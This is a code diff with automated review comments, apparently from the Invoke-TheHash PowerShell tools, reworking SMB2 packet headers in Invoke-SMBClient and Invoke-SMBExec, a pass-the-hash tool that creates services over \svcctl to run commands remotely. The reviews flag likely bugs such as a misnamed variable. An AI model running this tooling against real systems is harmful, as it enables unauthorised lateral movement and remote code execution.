@@ -224,7 +226,7 @@ function New-PacketSMB2Header
$packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("MessageID",$packet_message_ID)
- $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("ProcessID",$packet_process_ID)
$packet_SMB2Header.Add("TreeID",$packet_tree_ID)
$packet_SMB2Header.Add("SessionID",$packet_session_ID)
$packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
@@ -746,15 +748,20 @@ elseif($Source -is [String])
[String]$session_string = $session
-if($session_string -and !$Inveigh -or !$inveigh.session_socket_table[$session])
-{
- Write-Output "[-] Inveigh Relay session not found"
- $startup_error = $true
-}
-elseif($session_string -and !$inveigh.session_socket_table[$session].Connected)
+if($session_string)
{
- Write-Output "[-] Inveigh Relay session not connected"
- $startup_error = $true
+
+ if(!$Inveigh -or !$inveigh.session_socket_table[$session])
+ {
+ Write-Output "[-] Inveigh Relay session not found"
+ $startup_error = $true
+ }
+ elseif(!$inveigh.session_socket_table[$session].Connected)
+ {
+ Write-Output "[-] Inveigh Relay session not connected"
+ $startup_error = $true
+ }
+
}
$destination = $Destination.Replace('.\','')
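Review bot: The nested form fixes the `-and ... -or` precedence problem of the old condition, but `$session_string` is derived unconditionally at the top of the hunk with `[String]$session_string = $session`; if `$Session` is an `[Int]` parameter as it is in Invoke-SMBExec (L1793), an unspecified session becomes the string "0", which is truthy, and the session-not-found branch would fire on every non-session run. Worth confirming that the cast is guarded elsewhere, or testing `if($PSBoundParameters.ContainsKey('Session'))` here instead of `if($session_string)`. The parameter handling this check belongs to starts before the hunk.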
@@ -775,8 +782,7 @@ else
$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
-#[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-[Byte[]]$process_ID_bytes = 0x00,0x00,0x00,0x00
+[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
if(!$session_string_string)
{
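Review bot: `if(!$session_string_string)` tests a variable that is never assigned in this hunk or the one above it, where the value is stored as `$session_string` (L1571); unless it is set somewhere outside the visible diff, the condition is always true and the non-session setup path runs even when a relay session was requested. If it is the typo it appears to be, the line should read `if(!$session_string)`. The block the condition opens continues past the hunk.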
@@ -997,7 +1003,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'NegotiateSMB'
{
- $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes[0,1] 0x00,0x00
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00
$packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -1042,8 +1048,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
$SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$SMB2_message_ID = 1
- $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -1058,9 +1063,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'NTLMSSPNegotiate'
{
- $SMB2_message_ID ++
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
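Review bot: The credit request for the SMB2 session-setup messages is lowered to `0x00,0x00` here and in the NTLMSSPAuth stage (hunk at L1633), while the same two stages in Invoke-SMBExec (L1873, L1884) now request `0x1f,0x00`; both files are adjusted in this commit under the same credit-tweak rationale, so one of the two values looks unintended. Requesting zero credits during setup leaves the client dependent on whatever the server grants unasked, which is presumably what the later `0x01,0x00` stages rely on; a short comment stating the intended strategy, `# request no extra credits during session setup; one credit per request afterwards`, would let a future reader tell which value is deliberate. The switch stage shown here begins before the hunk.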
@@ -1173,9 +1177,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
$NTLMv2_response
- $SMB2_message_ID ++
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
@@ -1240,8 +1243,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'TreeConnect'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1354,8 +1356,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB_ioctl_path = "\" + $Target + "\" + $Share
$SMB_ioctl_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_ioctl_path) + 0x00,0x00
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1388,8 +1389,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1686,8 +1686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'QueryInfoRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_header["NextCommand"] = $header_next_command
if($SMB_signing)
@@ -1709,8 +1708,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1859,8 +1857,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'SetInfoRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1920,8 +1917,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateRequestFindRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1947,8 +1943,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2b_header["NextCommand"] = 0x68,0x00,0x00,0x00
if($SMB_signing)
@@ -1974,8 +1969,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2c_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2229,8 +2223,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
{
$SMB_file_ID = $SMB_client_receive[132..147]
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_header["NextCommand"] = 0x68,0x00,0x00,0x00
if($SMB_signing)
@@ -2252,8 +2245,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2322,8 +2314,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB_file_ID = $SMB_client_receive[132..147]
}
- $SMB2_message_ID ++
- $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2443,7 +2435,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'ReadRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_header["CreditCharge"] = 0x01,0x00
if($SMB_signing)
@@ -2576,7 +2568,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_header["CreditCharge"] = 0x01,0x00
if($SMB_signing)
@@ -2653,7 +2645,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'TreeDisconnect'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2694,7 +2686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'Logoff'
{
$SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
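Review bot: `$SMB2_message_ID += 20` in the Logoff stage survives while every other stage in this file now requests a single credit (`0x01,0x00`) and Invoke-SMBExec in this same commit replaces each `+= 20` with `++` (L1952, L1961, L1971 and others). If the server grants only the one credit being requested, a MessageId that jumps 20 ahead of the last granted sequence is likely to be rejected and the logoff would fail; the consistent change is `$SMB2_message_ID++`. The switch statement this stage belongs to begins before the hunk.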
diff --git a/Invoke-SMBExec.ps1 b/Invoke-SMBExec.ps1
index 7a4d868..1a2e3b5 100644
--- a/Invoke-SMBExec.ps1
+++ b/Invoke-SMBExec.ps1
@@ -72,10 +72,10 @@ param
[parameter(ParameterSetName='Default',Mandatory=$true)][String]$Username,
[parameter(ParameterSetName='Default',Mandatory=$false)][String]$Domain,
[parameter(Mandatory=$false)][String]$Command,
- [parameter(ParameterSetName='Default',Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y",
[parameter(ParameterSetName='Default',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash,
[parameter(Mandatory=$false)][String]$Service,
- [parameter(ParameterSetName='Default',Mandatory=$true)][Switch]$SigningCheck,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][Switch]$SigningCheck,
[parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session,
[parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff,
[parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh,
@@ -127,6 +127,8 @@ function New-PacketSMBHeader
{
param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+ $packet_process_ID = $packet_process_ID[0,1]
+
$packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
$packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
$packet_SMBHeader.Add("Command",$packet_command)
@@ -338,7 +340,7 @@ function New-PacketSMBLogoffAndXRequest
}
#SMB2
-
+<#
function New-PacketSMB2Header
{
param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
@@ -352,7 +354,7 @@ function New-PacketSMB2Header
$packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
$packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
$packet_SMB2Header.Add("Command",$packet_command)
- $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x01,0x00))
$packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("MessageID",$packet_message_ID)
@@ -363,6 +365,31 @@ function New-PacketSMB2Header
return $packet_SMB2Header
}
+#>
+function New-PacketSMB2Header
+{
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Command",$packet_command)
+ $packet_SMB2Header.Add("CreditRequest",$packet_credit_request)
+ $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("ProcessID",$packet_process_ID)
+ $packet_SMB2Header.Add("TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+}
function New-PacketSMB2NegotiateProtocolRequest
{
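Review bot: The previous New-PacketSMB2Header is kept as a `<# ... #>` comment block (hunks at L1804 and L1812) and is even edited inside the comment at L1817 rather than deleted; version control already preserves it, and a second stale definition of the same name is easy to mistake for live code, so the commented-out block should go. The replacement function has no header comment; a brief one would help, e.g. `# Builds the 64-byte SMB2 header (StructureSize 0x40); $packet_process_ID is the caller's process-id byte array and $packet_credit_request the two-byte credit count`. The header fields other than CreditRequest and ProcessID remain hard-coded, which is fine but worth stating in that comment.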
@@ -870,7 +897,6 @@ if($session_string)
$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
-$process_ID = $process_ID -replace "-00-00",""
[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
if(!$session_string)
@@ -1008,7 +1034,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
$SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$SMB2_message_ID = 1
- $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -1044,8 +1070,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
else
{
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
@@ -1182,8 +1208,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
else
{
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
@@ -1560,7 +1586,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateServiceW'
{
$packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
-
+
if($SMB_signing)
{
$packet_SMB_header["Flags2"] = 0x05,0x48
@@ -2023,8 +2049,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'TreeConnect'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2065,12 +2090,10 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateRequest'
{
- #$SMB2_tree_ID = 0x01,0x00,0x00,0x00
$SMB2_tree_ID = $SMB_client_receive[40..43]
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2124,8 +2147,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
$SMB_file_ID = $SMB_client_receive[132..147]
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2160,12 +2182,9 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'ReadRequest'
{
-
Start-Sleep -m $Sleep
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
- $packet_SMB2_header["CreditCharge"] = 0x10,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2173,6 +2192,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
$packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
@@ -2216,9 +2236,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'OpenSCManagerW'
{
- $SMB2_message_ID += 23
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2280,7 +2299,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
else
{
Write-Output "$output_username is a local administrator on $Target"
- $SMB2_message_ID += 20
+ $SMB2_message_ID++
$SMB_close_service_handle_stage = 2
$SMB_client_stage = 'CloseServiceHandle'
}
@@ -2304,9 +2323,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
if($SMBExec_command_bytes.Length -lt $SMB_split_index)
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2348,9 +2366,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateServiceW_First'
{
$SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2399,8 +2416,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
{
$SMB_split_stage++
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2447,8 +2463,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateServiceW_Last'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2489,9 +2504,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
{
